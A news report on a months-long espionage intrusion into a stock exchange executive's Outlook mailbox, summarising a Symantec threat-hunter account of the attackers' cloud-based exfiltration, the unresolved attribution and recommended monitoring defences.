In a significant cyber espionage incident, hackers infiltrated the Outlook mailbox of a senior executive at a leading global stock exchange for over five months, according to a report by Symantec and Carbon Black’s Threat Hunter Team. The attackers stealthily extracted inbox contents using cloud services such as Dropbox and OneDrive to mask their activities among regular network traffic.
Methodical Espionage Operation
Revealed earlier this week, the attack appears driven by intelligence gathering rather than financial theft, as detailed by Symantec. The attackers accessed the executive’s mailbox, potentially exposing sensitive information like non-public listing details, market strategies, and private communications, which could influence market dynamics.
Initial malicious activity was detected on October 10, 2025, when attackers had already established control over the target system. They utilized two binaries operating at the highest Windows privilege level, posing as updates from Adobe and OneDrive. The precise method of the initial system breach remains unknown, though Symantec suggests lateral movement from a previously compromised device.
Stealthy Data Exfiltration
The operation intensified on November 12, 2025, with the hackers leveraging a Dropbox API token and utilizing the ‘curl’ command for data uploads. The primary tool was a mailbox stealer based on the Aspose .NET library, which converted and exported Outlook mailbox files. The attackers returned repeatedly every few weeks to capture new data, avoiding detection by mimicking regular system tasks and utilizing personal cloud storage for exfiltration.
To further blend in, the attackers connected to hard-coded Microsoft IP addresses, bypassing DNS lookups that could trigger security alerts. They also tested other public file hosting services but eventually focused on Dropbox and OneDrive for their exfiltration activities.
Unresolved Attribution and Defense Measures
The incident remains unattributed, with generic tools and consumer cloud services obscuring clear links to any known hacking groups. The attackers employed various tools for traffic tunneling and credential dumping, but the lack of specific identifiers leaves the responsible party unknown.
Security experts emphasize the importance of monitoring for unusual mailbox activities and data transfers to personal cloud accounts. Organizations, especially those dealing with market-sensitive information, are advised to integrate threat indicators and remain vigilant against similar tactics.
This breach underscores the ongoing challenges in cybersecurity where traditional patches offer no solution. Instead, robust monitoring and response strategies are crucial to protecting valuable information assets.
